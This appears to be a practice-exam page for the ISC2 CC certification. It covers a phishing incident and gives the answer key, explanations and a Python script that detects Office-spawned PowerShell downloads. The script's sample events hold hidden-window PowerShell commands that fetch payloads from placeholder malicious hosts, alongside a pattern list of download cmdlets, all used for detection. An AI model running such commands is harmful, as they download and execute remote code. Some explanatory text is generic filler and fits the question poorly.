Question 228 of 500
Security Operations · hard · Multiple Select · Objective-mapped

Quick Answer

The answer is to block the malicious domain at the email gateway and isolate the workstation from the network. These two immediate containment actions for a phishing incident stop the attack at its source and cut off the compromised system from the attacker’s command-and-control server, preventing data exfiltration and lateral movement. Blocking the domain at the gateway prevents further malicious emails from reaching other users, while isolation aligns with the NIST SP 800-61 containment strategy of stopping the spread before deeper analysis. On the ISC2 Certified in Cybersecurity CC exam, this question tests your ability to prioritize containment over eradication or recovery—a common trap is choosing to delete the email or run antivirus first, which are later steps. Remember the memory tip: “Gateway and isolate—don’t hesitate.” This pairs the two immediate actions: stop the inbound threat at the gateway, then isolate the infected host to sever the attacker’s remote control.

ISC2 CC Security Operations Practice Question

This CC practice question tests your understanding of security operations. Read the scenario carefully and evaluate each option against the stated constraints before committing to an answer. After answering, compare your reasoning against the explanation and wrong-answer breakdown below. Once you have made your selection, read the full explanation to reinforce the concept and understand why each distractor is designed to mislead on exam day.

A SOC analyst is investigating an incident where an employee's workstation was compromised via a phishing email. The analyst has captured the following indicators: the email originated from a known malicious domain, the attachment was a macro-enabled document, and the macro executed a PowerShell command that downloaded a payload from a remote server. Which TWO actions should the analyst take immediately as part of the incident response process? (Choose two.)

Clue words in this question

Noticing these words before you look at the options changes how you read each choice.

  • Clue: "immediately / without restart"

    Why it matters: Time or reboot constraint — the correct answer must take effect right away without requiring a reboot or reload.


Correct answer & explanation

Isolate the workstation from the network.

Option B is correct because isolating the workstation from the network is a critical containment step in incident response. It immediately stops the compromised system from communicating with the attacker's command-and-control server, preventing further data exfiltration or lateral movement. This aligns with the NIST SP 800-61 containment strategy, which prioritizes stopping the spread of an incident before deeper analysis.

Key principle: Answer the scenario, not the keyword: identify the specific constraint before choosing the most familiar-sounding option.

Answer analysis

Option-by-option breakdown

For each option: why learners choose it and why it is or isn't the right answer here.

  • Contact law enforcement immediately.

    Why it's wrong here

    Law enforcement contact is not an immediate step in initial containment.

  • Isolate the workstation from the network.

    Why this is correct

    Isolation contains the threat and prevents spread.

    Clue confirmation

    The clue word "immediately / without restart" in the question points toward this answer.

    Related concept

    Read the scenario before looking for a memorised answer.

  • Analyze the macro code in a sandbox.

    Why it's wrong here

    Analysis is important but not immediate; containment takes priority.

  • Block the malicious domain at the email gateway.

    Why this is correct

    Blocking the domain prevents additional emails from reaching users.

    Clue confirmation

    The clue word "immediately / without restart" in the question points toward this answer.

    Related concept

    Read the scenario before looking for a memorised answer.

  • Delete the phishing email from all mailboxes.

    Why it's wrong here

    Deleting the email destroys evidence; preserve it.

Common exam traps

Common exam trap: answer the scenario, not the keyword

ISC2 often tests the distinction between immediate containment actions (isolate, block at gateway) and later forensic or administrative steps (analyze macro, contact law enforcement, delete emails) to see if candidates understand the priority of stopping the threat first.

Detailed technical explanation

How to think about this question

In a phishing incident involving a macro-enabled document, the PowerShell command often uses techniques like Invoke-WebRequest or System.Net.WebClient to download a payload. Isolating the workstation (e.g., via network access control or disabling the NIC) cuts off the outbound TCP connection to the remote server, which is essential because the payload may be a dropper that establishes persistence or a backdoor. Blocking the malicious domain at the email gateway leverages DNS or SMTP filtering to prevent the same threat from reaching other users, which is a proactive containment measure at the perimeter.
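
The chain described above (Office document, macro, PowerShell download cmdlet, remote payload) is what a SOC analyst would look for in process-creation telemetry before deciding on containment. The following Python is an added example, not code from the original page: it runs a simple detection over constructed, hypothetical EDR-style events and turns the hits into the two immediate actions the question asks for (isolate the host, block the domain at the gateway), while keeping the email as evidence rather than deleting it. All host names, domains and event fields are made up for the illustration.

```python
"""Triage helper for the Office -> PowerShell -> download chain (example code,
not part of the original page). It flags matching process-creation events and
returns the immediate containment plan the question expects."""
import re
from urllib.parse import urlparse

# Constructed sample events in a simplified Sysmon/EDR-like shape (hypothetical data).
SAMPLE_EVENTS = [
    {"host": "WS-1042", "parent": "OUTLOOK.EXE", "image": "WINWORD.EXE",
     "cmdline": r'"C:\Program Files\Microsoft Office\WINWORD.EXE" /n invoice.docm'},
    {"host": "WS-1042", "parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -c \"Invoke-WebRequest "
                "http://files.example-malicious.test/stage.ps1 -OutFile C:\\Users\\Public\\s.ps1\""},
    {"host": "WS-2201", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\Scripts\\backup.ps1"},      # benign admin script
    {"host": "WS-3310", "parent": "EXCEL.EXE", "image": "powershell.exe",
     "cmdline": "powershell.exe -c \"(New-Object System.Net.WebClient)"
                ".DownloadString('https://cdn.example-malicious.test/p')\""},
]

# Office parents that should rarely, if ever, spawn PowerShell.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Download primitives named in the explanation above, plus a few common equivalents.
DOWNLOAD_PATTERNS = re.compile(
    r"invoke-webrequest|\biwr\b|system\.net\.webclient|downloadstring|downloadfile|start-bitstransfer",
    re.I)
URL_PATTERN = re.compile(r"https?://[^\s'\"\)]+", re.I)


def flag_event(ev):
    """Return (host, payload_domain) if the event is Office -> PowerShell -> download, else None."""
    if ev["image"].lower() != "powershell.exe":
        return None
    if ev["parent"].lower() not in OFFICE_PARENTS:
        return None
    if not DOWNLOAD_PATTERNS.search(ev["cmdline"]):
        return None
    m = URL_PATTERN.search(ev["cmdline"])
    domain = urlparse(m.group(0)).hostname if m else None
    return ev["host"], domain


def containment_actions(events, sender_domain):
    """Build the immediate containment plan: isolate affected hosts, block the
    sender domain at the email gateway, and block observed payload domains.
    The original email is preserved as evidence, not deleted."""
    hosts, payload_domains = [], []
    for ev in events:
        hit = flag_event(ev)
        if hit is None:
            continue
        host, domain = hit
        if host not in hosts:
            hosts.append(host)
        if domain and domain not in payload_domains:
            payload_domains.append(domain)
    actions = [f"isolate host {h} (NAC quarantine / disable NIC)" for h in hosts]
    actions.append(f"block sender domain {sender_domain} at the email gateway")
    actions += [f"block payload domain {d} at DNS/proxy" for d in payload_domains]
    actions.append("preserve the original email and attachment as evidence")
    return {"hosts": hosts, "payload_domains": payload_domains, "actions": actions}


if __name__ == "__main__":
    plan = containment_actions(SAMPLE_EVENTS, "phish.example-sender.test")
    for a in plan["actions"]:
        print(a)
```

The benign event (PowerShell launched from Explorer for a backup script) is deliberately included so the parent-process check does real work; analysis of the macro itself and any law-enforcement contact sit outside this plan, matching the question's ordering of containment before those later steps.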

Key Concepts to Remember

  • Read the scenario before looking for a memorised answer.
  • Find the constraint that changes the correct option.
  • Eliminate answers that are true in general but not in this case.

Exam Day Tips

  • Watch for words such as best, first, most likely and least administrative effort.
  • Review why wrong options are wrong, not only why the correct option is correct.

Key takeaway

Answer the scenario, not the keyword: identify the specific constraint before choosing the most familiar-sounding option.

Real-world example

How this comes up in practice

An employee at a financial services firm receives an email that appears to come from the IT helpdesk, asking them to reset their password via a link. The link leads to a convincing fake portal that harvests credentials. Security teams use phishing simulations and security-awareness training to reduce this attack vector. Questions like this test whether you can identify social engineering techniques and appropriate controls.

What to study next

Got this wrong? Here's your next step.

Identify which exam domain this question belongs to, review the core concept, then practise similar questions from the same domain.


FAQ

Questions learners often ask

What does this CC question test?

Security Operations. This question tests the Security Operations domain: read the scenario before looking for a memorised answer.

What is the correct answer to this question?

The correct answer is: Isolate the workstation from the network. — Option B is correct because isolating the workstation from the network is a critical containment step in incident response. It immediately stops the compromised system from communicating with the attacker's command-and-control server, preventing further data exfiltration or lateral movement. This aligns with the NIST SP 800-61 containment strategy, which prioritizes stopping the spread of an incident before deeper analysis.

What should I do if I get this CC question wrong?

Identify which exam domain this question belongs to, review the core concept, then practise similar questions from the same domain.

Are there clue words in this question I should notice?

Yes — watch for: "immediately / without restart". Time or reboot constraint — the correct answer must take effect right away without requiring a reboot or reload.

What is the key concept behind this question?

Read the scenario before looking for a memorised answer.

About these practice questions

Courseiva creates original exam-style practice questions with explanations and wrong-answer analysis. It does not publish real exam questions, exam dumps, or protected exam content.

Last reviewed: Jun 30, 2026


This CC practice question is part of Courseiva's free ISC2 certification practice question bank. Courseiva provides original exam-style practice questions with explanations, topic-based practice, mock exams, readiness tracking, and study analytics to help learners prepare for the CC exam.